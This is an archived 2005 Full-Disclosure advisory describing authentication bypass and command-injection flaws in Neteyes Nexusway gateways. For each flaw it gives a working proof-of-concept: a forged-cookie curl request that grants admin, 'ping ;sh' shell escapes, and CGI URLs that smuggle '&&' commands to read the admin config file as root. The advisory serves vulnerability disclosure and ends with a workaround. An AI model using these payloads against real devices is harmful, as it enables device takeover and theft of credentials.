| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 11 May 2005 11:46:39 +0800 From: pokley <pokleyzz@...n-associates.net> To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>, "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk> Subject: [Scan Associates Advisory] Neteyes Nexusway multiple vulnerability Product : Neteyes Nexusway (http://www.neteyes.com.tw) Description: Neteyes Nexusway multiple vulnerability Severity: Very High Description =========== The NexusWay is a Multiservice Border Gateway that provides the Multiaccess and Multiservice capabilities in the border segment of an enterprise network. Detail ====== Weak authentication in web module --------------------------------- By sending crafted http cookies, any user with access to port 443 on Neteyes Nexusway may use this vulnerability to become Neteyes Nexusway admin. This will allow user to change any configuration on this device. Example: # curl -k -b 'cyclone500_write=1; cyclone500_auth=1; client_ip1;client=0.0.0.0' https://192.168.1.135/index.cgi Escaping to Operating System shell in SSH module ------------------------------------------------ User with access to SSH module may able to access Shell or execute any command as "root" privileges on Neteyes Nexusway by sending crafted argument in certain command. This will allow user to do anything on this device. Example: > ping ;sh > traceroute ;sh Remote command execution in web module -------------------------------------- Any user with access to port 443 on Neteyes Nexusway is able to fully control Neteyes Nexusway device by sending special crafted packet to certain administration script. Web server is run as "root" on this devices. Example: https://192.168.1.135/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin https://192.168.1.135/ping.cgi?ip=localhost%26%26touch+/tmp/test Workaround ========== Disable Web Administration module _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists